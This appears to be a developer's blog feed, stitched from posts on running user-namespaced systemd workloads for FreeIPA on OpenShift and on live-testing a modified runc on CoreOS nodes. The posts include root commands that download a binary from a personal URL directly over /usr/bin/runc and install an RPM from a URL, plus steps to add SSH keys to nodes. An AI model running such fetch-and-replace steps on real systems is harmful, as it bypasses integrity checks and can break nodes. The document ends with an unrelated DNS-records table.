user.user.openshift.io/test created
% oc adm policy add-role-to-user admin test
clusterrole.rbac.authorization.k8s.io/admin added: "test"
% oc adm policy add-scc-to-user anyuid test
securitycontextconstraints.security.openshift.io/anyuid added to: ["test"]
Create service and route §
Create a service to provide HTTP access to pods matching the app: nginx selector:
apiVersion: v1
kind: Service
metadata:
  name: nginx
spec:
  selector:
    app: nginx
  ports:
    - protocol: TCP
      port: 80
% oc create -f service-nginx.yaml
service/nginx created
The following route definition will provide HTTP ingress from
outside the cluster:
apiVersion: v1
kind: Route
metadata:
  name: nginx
spec:
  host: nginx.apps.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com
  to:
    kind: Service
    name: nginx
Note the host field. Its value is nginx.apps.$CLUSTER_DOMAIN.
Change it to the proper value for your cluster, then create the
route:
% oc create -f route-nginx.yaml
route.route.openshift.io/nginx created
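The host value can be derived from the API server URL that oc new-project printed. The sketch below assumes the naming convention seen in this cluster (API at api.$CLUSTER_DOMAIN, routes under apps.$CLUSTER_DOMAIN); clusters with a customised ingress domain will differ, and the function names are my own.

```python
from urllib.parse import urlsplit


def cluster_domain(api_url):
    """Strip the leading "api." label from the API server hostname."""
    host = urlsplit(api_url).hostname
    if host is None or not host.startswith("api."):
        raise ValueError("unexpected API URL: %r" % (api_url,))
    return host[len("api."):]


def route_host(api_url, name):
    """Build the default-style route hostname for an application name."""
    return "%s.apps.%s" % (name, cluster_domain(api_url))
```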
There is no pod to route the traffic to… yet.
Create pod §
The pod specification is:
apiVersion: v1
kind: Pod
metadata:
  name: nginx
  labels:
    app: nginx
  annotations:
    io.kubernetes.cri-o.userns-mode: "auto:size=65536"
spec:
  securityContext:
    sysctls:
    - name: "net.ipv4.ping_group_range"
      value: "0 65535"
  containers:
  - name: nginx
    image: quay.io/ftweedal/test-nginx:latest
    tty: true
Create the pod:
% oc --as test create -f pod-nginx.yaml
pod/nginx created
After a few seconds, the pod is running:
% oc get -o json pod/nginx | jq .status.phase
"Running"
Tail the pod’s log. Observe the final lines of systemd boot output
and the login prompt:
% oc logs --tail 10 pod/nginx
[  OK  ] Started The nginx HTTP and reverse proxy server.
[  OK  ] Reached target Multi-User System.
[  OK  ] Reached target Graphical Interface.
         Starting Update UTMP about System Runlevel Changes...
[  OK  ] Finished Update UTMP about System Runlevel Changes.

Fedora 33 (Container Image)
Kernel 4.18.0-305.3.1.el8_4.x86_64 on an x86_64 (console)

nginx login: %

Without tty: true in the Container spec, the pod won’t produce
any output and oc logs won’t have anything to show.

The log tail also shows that systemd started the nginx service.
We already set up a route in the previous step. Use curl to
issue an HTTP request and verify that the service is running
properly:
% curl --head \
    nginx.apps.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 21 Jul 2021 06:55:38 GMT
Content-Type: text/html
Content-Length: 5564
Last-Modified: Mon, 27 Jul 2020 22:20:49 GMT
ETag: "5f1f5341-15bc"
Accept-Ranges: bytes
Set-Cookie: 6cf5f3bc2fa4d24f45018c591d3617c3=f114e839b2eef9cdbe00856f18a06336; path=/; HttpOnly
Cache-control: private
Verify sandbox §
Now let’s verify that the container is indeed running in a user
namespace. Container UIDs must map to unprivileged UIDs on the
host. Query the worker node on which the pod is running, and its
CRI-O container ID:
% oc get -o json pod/nginx | jq \
    '.spec.nodeName, .status.containerStatuses[0].containerID'
"ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w"
"cri-o://bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0"
Start a debug shell on the node and query the PID of the container
init process:
% oc debug node/ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w
Starting pod/ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.32.4
If you don't see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# crictl inspect bf2b3d | jq .info.pid
7759
Query the UID map and process tree of the container:
sh-4.4# cat /proc/7759/uid_map
         0     200000      65536
sh-4.4# pgrep --ns 7759 | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
200000      7759 /sbin/init
200000      7796 /usr/lib/systemd/systemd-journald
200193      7803 /usr/lib/systemd/systemd-resolved
200000      7806 /usr/lib/systemd/systemd-homed
200000      7807 /usr/lib/systemd/systemd-logind
200081      7809 /usr/bin/dbus-broker-launch --scope system --audit
200000      7812 /sbin/agetty -o -p -- \u --noclear --keep-baud console 115200,38400,9600 xterm
200081      7813 dbus-broker --log 4 --controller 9 --machine-id 2f2fcc4033c5428996568ca34219c72a --max-bytes 5
200000      7815 nginx: master process /usr/sbin/nginx
200999      7816 nginx: worker process
200999      7817 nginx: worker process
200999      7818 nginx: worker process
200999      7819 nginx: worker process
This confirms that the container has a user namespace. The
container’s UID range is 0–65535, which maps to the host UID
range 200000–265535. The ps output shows various services
running under systemd, running under unprivileged host UIDs in this
range.
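Each line of uid_map has three fields: the first ID inside the namespace, the first ID outside it, and the length of the range. The translation from container UID to host UID can be sketched as follows; the function names are my own.

```python
def parse_id_map(text):
    """Parse /proc/<pid>/uid_map (or gid_map) into (inside, outside, count)."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 3:
            inside, outside, count = (int(field) for field in fields)
            entries.append((inside, outside, count))
    return entries


def to_host_id(entries, inside_id):
    """Translate an ID inside the namespace to the ID outside it.

    Returns None when the ID is not mapped.
    """
    for inside, outside, count in entries:
        if inside <= inside_id < inside + count:
            return outside + (inside_id - inside)
    return None
```

With the map shown above, container UID 0 translates to 200000 and container UID 999 to 200999, which matches the nginx master and worker processes in the ps output.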
So, everything is running as expected. One last thing: let’s look
at the cgroup ownership. Query the container’s cgroupsPath:
sh-4.4# crictl inspect bf2b3d | jq .info.runtimeSpec.linux.cgroupsPath
"kubepods-besteffort-podc7f11ee7_e178_4dea_9d8c_c005ad648988.slice:crio:bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0"
The value isn’t a filesystem path. runc interprets it relative to
an implementation-defined location. We expect the cgroup directory
and the three files mentioned earlier to be owned by the user that
maps to UID 0 in the container’s user namespace. In my case,
that’s 200000. We also expect to see scopes and slices created by
systemd in the container to be owned by the same user.
sh-4.4# ls -ali /sys/fs/cgroup\
/kubepods.slice/kubepods-besteffort.slice\
/kubepods-besteffort-podc7f11ee7_e178_4dea_9d8c_c005ad648988.slice\
/crio-bf2b3d15cbd6944366e29927988ba30bc36d1efee00c28fb4c6d5b2036e462b0.scope \
    | grep 200000
14755 drwxr-xr-x.  5 200000 root   0 Jul 21 06:00 .
14757 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.procs
14760 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.subtree_control
14758 -rw-r--r--.  1 200000 root   0 Jul 21 06:00 cgroup.threads
14806 drwxr-xr-x.  2 200000 200000 0 Jul 21 06:00 init.scope
14835 drwxr-xr-x. 11 200000 200000 0 Jul 21 06:15 system.slice
14922 drwxr-xr-x.  2 200000 200000 0 Jul 21 06:00 user.slice
Note the inode of the container cgroup directory: 14755. We can query the
inode and ownership of /sys/fs/cgroup within the pod:
% oc exec pod/nginx -- ls -ldi /sys/fs/cgroup
14755 drwxr-xr-x. 5 root nobody 0 Jul 21 06:00 /sys/fs/cgroup
The inode is the same; this is indeed the same cgroup. But within the
container’s user namespace, the owner appears as root.
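For reference, the relationship between the cgroupsPath value and the directory listed above can be sketched as follows. This assumes the slice:prefix:name form of cgroupsPath and a cgroups v2 hierarchy mounted at /sys/fs/cgroup, as in the listing. The function names are hypothetical, and slice names containing escaped characters are not handled.

```shell
# Expand a systemd slice name into its nested directory path, e.g.
# "a-b.slice" becomes "a.slice/a-b.slice". The body runs in a subshell
# so that the IFS change and the variables stay local.
# expand_slice is a hypothetical helper name.
expand_slice() (
    set -f
    name="${1%.slice}"
    IFS='-'
    prefix=""
    path=""
    for part in $name; do
        prefix="${prefix:+$prefix-}$part"
        path="${path:+$path/}$prefix.slice"
    done
    printf '%s\n' "$path"
)

# Convert "slice:prefix:name" into the cgroup directory, assuming the
# unified hierarchy is mounted at /sys/fs/cgroup.
# cgroups_path_to_dir is a hypothetical helper name.
cgroups_path_to_dir() (
    set -f
    IFS=':'
    set -- $1
    printf '/sys/fs/cgroup/%s/%s-%s.scope\n' "$(expand_slice "$1")" "$2" "$3"
)
```

Passing the cgroupsPath value reported by crictl to cgroups_path_to_dir should print the directory that was given to ls above.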
This concludes the verification steps. With my modified version of
runc, systemd-based workloads are indeed working properly in user
namespaces.
Next steps §
I submitted a pull request with these changes. It remains to be
seen if the general approach will be accepted, but initial feedback
is positive. Some implementation changes are needed. I might have
to hide the behaviour behind a feature gate (e.g. to be activated
via an annotation). I also need to write tests and documentation.
I also need to raise a ticket for the SCC issue. The requirement
for RunAsAny (which is granted by the anyuid SCC) should be
relaxed when the sandbox has a user namespace. The SCC enforcement
machinery needs to be enhanced to understand user namespaces, so
that unprivileged OpenShift user accounts can run workloads in them.
It would be nice to find a way to avoid the sysctl override to allow
the container user to use ping. This is a much lower priority.
Alongside these matters, I can begin testing the FreeIPA container
in the test environment. Although systemd is now working, I need to
see if FreeIPA’s constituent services will run properly. I
anticipate that I will need to tweak the Pod configuration somewhat.
But are there more runtime capability gaps waiting to be discovered?
I don’t have a particular suspicion about it, but I do need to know
for certain, one way or the other. So expect another blog post
soon!


FreeIPA on OpenShift: July 2021 update
2021-07-21T00:00:00Z
FreeIPA on OpenShift: July 2021 update
Over the last year I’ve done a lot of investigations into OpenShift,
and container runtimes more generally. The driver of this work is
the FreeIPA on OpenShift project (known within Red Hat as IDMOCP).
I published the results of my investigations in numerous blog posts,
but I have not yet written much about why we are doing this at
all.
So it’s time to fix that. In this short post I discuss why we want
FreeIPA on OpenShift, and the major decision that put us on our
current implementation path.
FreeIPA is a centralised identity management system for the
enterprise. You enrol users, hosts and services, and configure
access policies and other security mechanisms. The system provides
authentication and policy enforcement mechanisms. It is similar to
Microsoft Active Directory (and indeed can integrate with AD).
FreeIPA is a complex system with lots of components including:

LDAP server (389 DS / RHDS)
Kerberos KDC (MIT Kerberos)
Certificate authority (Dogtag / RHCS)
HTTP API (Apache httpd and a lot of Python code)
Host client daemon (SSSD)
several smaller supporting services
installation and administration tools

FreeIPA is available on Fedora and RHEL. You install the RPMs and
the installation program configures the system. It is intended to
be deployed on a dedicated machine (VM or bare metal).
We are motivated to support FreeIPA on OpenShift for several
reasons, including:

Easily providing identity services to applications running on
OpenShift.
Leveraging OpenShift and Kubernetes orchestration, scaling and
management features to improve robustness and reduce management
overhead of FreeIPA deployments.
Offering FreeIPA, hosted on OpenShift, as a managed service.

Understandably, moving such an application to OpenShift is a
non-trivial task. At the beginning of this effort, we had to decide
the main implementation approach. There were three options:

Put the whole system in a single “monolithic container”, with
systemd as the init process. At the time (and still today)
OpenShift only supports running systemd workloads in privileged
containers, which is not acceptable. The runtime needs to evolve
to support this use case. Work on some of the missing features
(such as user namespaces and cgroups v2) was already underway.
Deploy different parts of the FreeIPA system in different
containers, running unprivileged. This is a fundamental shift
from the current architecture and a huge up-front engineering
effort. Also, the current architecture has to be maintained and
supported for a long time (>10 years). So this approach brings
a substantial ongoing cost in maintaining two architectures of
the same application. On a technical level, this approach is
feasible today.
Use a VM-based workload (Kata / OpenShift Sandboxed Containers).
This option probably has the lowest up-front and ongoing
engineering costs. But it requires a bare metal cluster or
nested virtualisation, which is not available from most cloud
providers. By extension, OpenShift Dedicated (OSD) also
does not support it. Red Hat managed services run on OSD.
Offering a managed service is one of the motivators of our
effort. So at this time, VM-based workloads are not an option
for us.

As a small team, and considering the business reality of the
existing offering as part of RHEL, we decided to pursue the
“monolithic container” approach. We are depending on the OpenShift
runtime evolving to a point where it can support fully isolated
systemd-based workloads. And that is why I have invested much of
the last 12 months in understanding container runtimes and pushing
their limits.
Our approach is not “cloud native” and indeed many people have
expressed alarm or confusion when we tell them what we are doing.
Certainly, if we were designing FreeIPA from the ground up in
today’s world, it would look very different from the current
architecture. But this is the reality: if you want customers to
bring their mature, complex applications onto OpenShift, don’t
expect them to spend big money and assume big risk to rearchitect
the application to fit the new environment.
What customers actually need is to be able to bring the application
across more or less as-is. Then they can realise the benefits
(automation, monitoring, scaling, etc) incrementally, with lower
up-front costs and less risk.
If my claims are correct, then proper systemd workload support in
OpenShift will be a Very Big Deal. But even if I’m wrong, it is
still critical for our FreeIPA on OpenShift effort. And it is
achievable. In my next post I’ll demonstrate my working proof of
concept for user-namespaced systemd workloads on OpenShift.


Live-testing changes in OpenShift clusters
2021-06-29T00:00:00Z
Live-testing changes in OpenShift clusters
I have been hacking on the runc container runtime. So how
do I test my changes in an OpenShift cluster?
One option is to compose a machine-os-content release via
coreos-assembler.
Then you can deploy or upgrade a cluster with that release. Indeed,
this approach is necessary for testing installation and upgrades.
It also seems useful for publishing modified versions for other
people to test. But it is a heavyweight and time-consuming option.
For development I want a more lightweight approach. In this post
I’ll demonstrate how to use the rpm-ostree usroverlay and
rpm-ostree override replace commands to test changes in a live
OpenShift cluster.
Background §
OpenShift runs on CoreOS. CoreOS uses OSTree to manage
the filesystem. Most of the filesystem is immutable. When
upgrading, a new filesystem is prepared before rebooting the system.
The old filesystem is preserved, so it is easy to roll back.
So I can’t just log onto an OpenShift node and replace
/usr/bin/runc with my modified version. Nevertheless, I have seen
references to the rpm-ostree usroverlay command. It is
supposed to provide a writable overlayfs on /usr, so that you can
test modifications. Changes are lost upon reboot, but that’s fine
for testing.
There’s also the rpm-ostree override replace … command. This
command works on the level of RPM packages. It allows you to
install new packages or replace or remove packages. Changes persist
across reboots, but it is easy to roll back to the pristine state
of the current CoreOS release.
The rest of this article explores how to use these two commands to
apply changes to the cluster.
usroverlay via debug container (doesn’t work) §
I first attempted to use rpm-ostree usroverlay in a node debug
pod.
% oc debug node/worker-a
Starting pod/worker-a-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don't see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm-ostree usroverlay
Development mode enabled.  A writable overlayfs is now mounted on /usr.
All changes there will be discarded on reboot.
sh-4.4# touch /usr/bin/foo
touch: cannot touch '/usr/bin/foo': Read-only file system
The rpm-ostree usroverlay command succeeded. But /usr remained
read-only. The debug container has its own mount namespace, which
was unaffected. I guess that I need to log into the node directly
to use the writable /usr overlay. Perhaps it is also necessary to
execute rpm-ostree usroverlay as an unconfined user (in the
SELinux sense). I restarted the node to begin afresh:
sh-4.4# reboot

Removing debug pod ...
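A quick way to check the mount namespace guess would be to compare namespace links under /proc. The sketch below is an assumption-laden illustration: same_mnt_ns is a hypothetical helper, it needs a Linux /proc, and it presumes that the debug pod shares the host PID namespace so that PID 1 is the host's init process.

```shell
# Succeed if two processes share a mount namespace. Arguments are PIDs
# (or "self"). Reading another process's namespace link usually needs
# root. Returns 2 if a link cannot be read.
# same_mnt_ns is a hypothetical helper name.
same_mnt_ns() {
    a="$(readlink "/proc/$1/ns/mnt")" || return 2
    b="$(readlink "/proc/$2/ns/mnt")" || return 2
    [ "$a" = "$b" ]
}

# Example, from the debug shell:
#   same_mnt_ns self 1 || echo "not in the mount namespace of PID 1"
```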
usroverlay via SSH §
For the next attempt, I logged into the worker node over SSH. The
first step was to add the SSH public key to the core user’s
authorized_keys file. Roberto Carratalá’s helpful blog post
explains how to do this. I will recap the critical bits.
SSH keys can be added via MachineConfig objects, which must also
specify the machine role (e.g. worker). The Machine Config
Operator will only add keys to the core user. Multiple keys can
be specified, across multiple MachineConfig objects—all the keys
in matching objects will be included.

I don’t have direct network access to the worker node. So how could
I log in over SSH? I generated a key in the node debug shell,
so that I could log in from there!
sh-4.4# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:jAmv…NMnY root@worker-a
sh-4.4# cat ~/.ssh/id_rsa.pub
ssh-rsa AAAA…4OU= root@worker-a

The following MachineConfig adds the SSH key for user core:
apiVersion: machineconfiguration.openshift.io/v1
kind: MachineConfig
metadata:
  name: ssh-authorized-keys-worker
  labels:
    machineconfiguration.openshift.io/role: worker
spec:
  config:
    ignition:
      version: 3.2.0
    passwd:
      users:
      - name: core
        sshAuthorizedKeys:
        - ssh-rsa AAAA…4OU= root@worker-a
I created the MachineConfig:
% oc create -f machineconfig-ssh-worker.yaml
machineconfig.machineconfiguration.openshift.io/ssh-authorized-keys-worker created
In the node debug shell, I observed that the Machine Config Operator
applied the change after a few seconds. It did not restart the
worker node. My key was added alongside a key defined in some other
MachineConfig.
sh-4.4# cat /var/home/core/.ssh/authorized_keys
ssh-rsa AAAA…jjNV devenv

ssh-rsa AAAA…4OU= root@worker-a
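Because the role appears in both the object name and the label, the manifest could also be generated for other roles. The following is a minimal sketch based on the MachineConfig shown earlier. render_ssh_machineconfig is a hypothetical helper name, and the name pattern ssh-authorized-keys-ROLE is only a convention borrowed from that example.

```shell
# Print a MachineConfig that adds one SSH public key for the core user.
# $1 is the machine role (e.g. worker), $2 is the public key line.
# render_ssh_machineconfig is a hypothetical helper name.
render_ssh_machineconfig() {
    cat <<EOF
apiVersion: machineconfiguration.openshift.io/v1
kind: MachineConfig
metadata:
  name: ssh-authorized-keys-$1
  labels:
    machineconfiguration.openshift.io/role: $1
spec:
  config:
    ignition:
      version: 3.2.0
    passwd:
      users:
      - name: core
        sshAuthorizedKeys:
        - $2
EOF
}

# Example:
#   render_ssh_machineconfig worker "$(cat ~/.ssh/id_rsa.pub)" | oc create -f -
```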
Now I could log in over SSH:
sh-4.4# ssh core@$(hostname)
The authenticity of host 'worker-a (10.0.128.2)' can't be established.
ECDSA key fingerprint is SHA256:LUaZOleqVFunmLCp4/E1naIQ+E5BpmVp0gcsXHGacPE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'worker-a,10.0.128.2' (ECDSA) to the list of known hosts.
Red Hat Enterprise Linux CoreOS 48.84.202106231817-0
  Part of OpenShift 4.8, RHCOS is a Kubernetes native operating system
  managed by the Machine Config Operator (`clusteroperator/machine-config`).

WARNING: Direct SSH access to machines is not recommended; instead,
make configuration changes via `machineconfig` objects:
  https://docs.openshift.com/container-platform/4.8/architecture/architecture-rhcos.html

---
[core@worker-a ~]$
The user is unconfined and I can see the normal, read-only (ro)
/usr mount (but no overlay):
[core@worker-a ~]$ id -Z
unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[core@worker-a ~]$ mount |grep "on /usr"
/dev/sda4 on /usr type xfs (ro,relatime,seclabel,attr2,inode64,logbufs=8,logbsize=32k,prjquota)
I executed rpm-ostree usroverlay via sudo. After that, a
read-write (rw) overlay filesystem is visible:
[core@worker-a ~]$ sudo rpm-ostree usroverlay
Development mode enabled.  A writable overlayfs is now mounted on /usr.
All changes there will be discarded on reboot.
[core@worker-a ~]$ mount |grep "on /usr"
/dev/sda4 on /usr type xfs (ro,relatime,seclabel,attr2,inode64,logbufs=8,logbsize=32k,prjquota)
overlay on /usr type overlay (rw,relatime,seclabel,lowerdir=usr,upperdir=/var/tmp/ostree-unlock-ovl.TCPM50/upper,workdir=/var/tmp/ostree-unlock-ovl.TCPM50/work)
And it is indeed writable. I made a copy of the original runc
binary, then installed my modified version:
[core@worker-a ~]$ sudo cp /usr/bin/runc /usr/bin/runc.orig
[core@worker-a ~]$ sudo curl -Ss -o /usr/bin/runc \
    https://ftweedal.fedorapeople.org/runc
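The before and after check on the mount table can be scripted. This is a small sketch that parses mount output in the format shown above; usr_overlay_writable is a hypothetical helper name.

```shell
# Read `mount` output on stdin and succeed if a writable (rw) overlay
# is mounted on /usr.
# usr_overlay_writable is a hypothetical helper name.
usr_overlay_writable() {
    awk '
        $3 == "/usr" && $5 == "overlay" && $6 ~ /^\(rw[,)]/ { found = 1 }
        END { exit !found }
    '
}

# Example:
#   mount | usr_overlay_writable && echo "usroverlay is active"
```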
Digression: use a buildroot §
The runc executable I installed in the previous step didn’t work.
I had built it on my workstation, against a too-new version of
glibc. The OpenShift node (which was running RHCOS 4.8, based on
RHEL 8.4) was unable to link runc. Therefore it could not run
any container workloads. I was able to SSH in from another node
and reboot, discarding the transient change in the usroverlay and
restoring the node to a functional state.
All of this is obvious in hindsight. You have to build the program
for the environment in which it will be executed. In my case, it
was easiest to do this via Brew or Koji. I cloned the dist-git
repository (via the fedpkg or rhpkg tool), created patches and
updated the runc.spec file. Then I built the SRPM (.src.rpm)
and started a scratch build in Brew. After the build completed I
made the resulting .rpm publicly available, so that it can be
fetched from the OpenShift cluster.
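If the failure comes from glibc symbol versions, a mismatch of this kind can be spotted before copying a binary to the node. The sketch below assumes that objdump (from binutils) and GNU sort are available on the build machine; max_glibc_required is a hypothetical helper name.

```shell
# Read `objdump -T <binary>` output on stdin and print the newest glibc
# symbol version that the binary requires. Relies on GNU sort -V.
# max_glibc_required is a hypothetical helper name.
max_glibc_required() {
    grep -o 'GLIBC_[0-9][0-9.]*' | sort -u -V | tail -n 1
}

# Example:
#   objdump -T ./runc | max_glibc_required
# Compare the result with the glibc version on the node (rpm -q glibc).
```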
override replace via node debug container §
I now have my modified runc in an RPM package. So I can use
rpm-ostree override replace to install it. In a node debug shell on
the host:
sh-4.4# rpm-ostree override replace \
  https://ftweedal.fedorapeople.org/runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64.rpm
Downloading 'https://ftweedal.fedorapeople.org/runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64.rpm'... done!
Checking out tree eb6dd3b... done
No enabled rpm-md repositories.
Importing rpm-md... done
Resolving dependencies... done
Applying 1 override
Processing packages... done
Running pre scripts... done
Running post scripts... done
Running posttrans scripts... done
Writing rpmdb... done
Writing OSTree commit... done
Staging deployment... done
Upgraded:
  runc 1.0.0-97.rhaos4.8.gitcd80260.el8 -> 1.0.0-98.rhaos4.8.gitcd80260.el8
Run "systemctl reboot" to start a reboot
rpm-ostree downloaded the package and prepared the updated OS.
Per the advice, the update is not active yet; I need to reboot:
sh-4.4# rpm -q runc
runc-1.0.0-97.rhaos4.8.gitcd80260.el8.x86_64
sh-4.4# systemctl reboot
sh-4.4# exit
sh-4.2# 
Removing debug pod ...
After reboot I started a node debug container and verified that the
modified version of runc is visible:
% oc debug node/worker-a
Starting pod/worker-a-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don't see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm -q runc
runc-1.0.0-98.rhaos4.8.gitcd80260.el8.x86_64
And the fact that the debug container is working proves that the
modified version of runc isn’t completely broken! Testing the new
functionality is a topic for a different post, so I’ll leave it at
that.
Listing and resetting overrides §
rpm-ostree status --booted lists the current base image and any
overrides that have been applied:
sh-4.4# rpm-ostree status --booted
State: idle
BootedDeployment:
* pivot://quay.io/openshift-release-dev/ocp-v4.0-art-dev@sha256:9a23adde268dc8937ae293594f58fc4039b574210f320ebdac85a50ef40220dd
              CustomOrigin: Managed by machine-config-operator
                   Version: 48.84.202106231817-0 (2021-06-23T18:21:06Z)
      ReplacedBasePackages: runc 1.0.0-97.rhaos4.8.gitcd80260.el8 -> 1.0.0-98.rhaos4.8.gitcd80260.el8
To reset an override for a specific package, run rpm-ostree override reset $PKG:
sh-4.4# rpm-ostree override reset runc
Staging deployment... done
Freed: 1.1 GB (pkgcache branches: 0)
Downgraded:
  runc 1.0.0-98.rhaos4.8.gitcd80260.el8 -> 1.0.0-97.rhaos4.8.gitcd80260.el8
Run "systemctl reboot" to start a reboot
To reset all overrides, execute rpm-ostree reset:
sh-4.4# rpm-ostree reset
Staging deployment... done
Freed: 54.8 MB (pkgcache branches: 0)
Downgraded:
  runc 1.0.0-98.rhaos4.8.gitcd80260.el8 -> 1.0.0-97.rhaos4.8.gitcd80260.el8
Run "systemctl reboot" to start a reboot
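To check from a script whether the booted deployment carries an override, the status text can be parsed. This is only a sketch against the output format shown above; replaced_base_packages is a hypothetical helper name.

```shell
# Read `rpm-ostree status` text output on stdin and print the value of
# each ReplacedBasePackages line. The exit status is non-zero when no
# override is listed.
# replaced_base_packages is a hypothetical helper name.
replaced_base_packages() {
    awk '
        /ReplacedBasePackages:/ {
            sub(/^.*ReplacedBasePackages: */, "")
            print
            found = 1
        }
        END { exit !found }
    '
}

# Example:
#   rpm-ostree status --booted | replaced_base_packages
```

Since a reset only stages a new deployment, I would expect the booted deployment to keep reporting the override until the node has rebooted.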
Discussion §
I achieved my goal of installing a modified runc executable on an
OpenShift node. There were two approaches:

rpm-ostree usroverlay creates a writable overlay on /usr.
The overlay disappears at reboot, which is fine for my testing
needs. This technique doesn’t work from a node debug container;
you have to log in over SSH, which requires additional steps to
add SSH keys.
rpm-ostree override replace overrides a particular package RPM.
The change takes effect after reboot and is persistent. It is
easy to roll back or reset the override. This technique does not
require SSH login; it works fine in a node debug container.

Because I needed to build my package in a RHEL 8.4 / RHCOS 4.8
buildroot, I used Brew. The build artifacts are RPMs. Therefore
rpm-ostree override replace is the most convenient option for me.
Both options apply changes per-node. CoreOS developers confirmed
that there is currently no way to roll out a package override
cluster-wide or to a defined group of nodes (e.g. to
MachineConfigPool/worker via a MachineConfig). So for now, you
either have to apply changes/overrides on specific nodes, or build
the whole machine-os-content image and upgrade the cluster. As a
container runtime developer, my sweet spot is in a gulf between the
existing options. I can tolerate this mild annoyance on the
assumption that it discourages messing around in production
environments.
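Applying an override node by node can at least be scripted from a workstation. The following is a rough sketch, not a supported rollout mechanism. It assumes that worker nodes carry the node-role.kubernetes.io/worker label and that oc debug can run a command non-interactively after the -- separator. override_on_workers and the OC variable are hypothetical names.

```shell
# Command used to talk to the cluster; override OC to substitute another
# client or a stub. The OC variable is a hypothetical convention.
OC="${OC:-oc}"

# Run `rpm-ostree override replace <url>` on every worker node via a
# node debug pod. Each node still needs a reboot afterwards.
# override_on_workers is a hypothetical helper name.
override_on_workers() {
    url="$1"
    for node in $("$OC" get nodes -l node-role.kubernetes.io/worker -o name); do
        "$OC" debug "$node" -- chroot /host rpm-ostree override replace "$url" </dev/null
    done
}

# Example:
#   override_on_workers https://example.invalid/runc.rpm
```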
In the meantime, now that I have worked out how to install my
modified runc onto worker nodes, I will get on with testing it!

Ingress endpoint	Resolution method	Records needed
`hostname`	direct	`CNAME`
`hostname`	SRV	`SRV`
`ip`	direct	`A`/`AAAA`
`ip`	SRV	`A`/`AAAA` and `SRV`
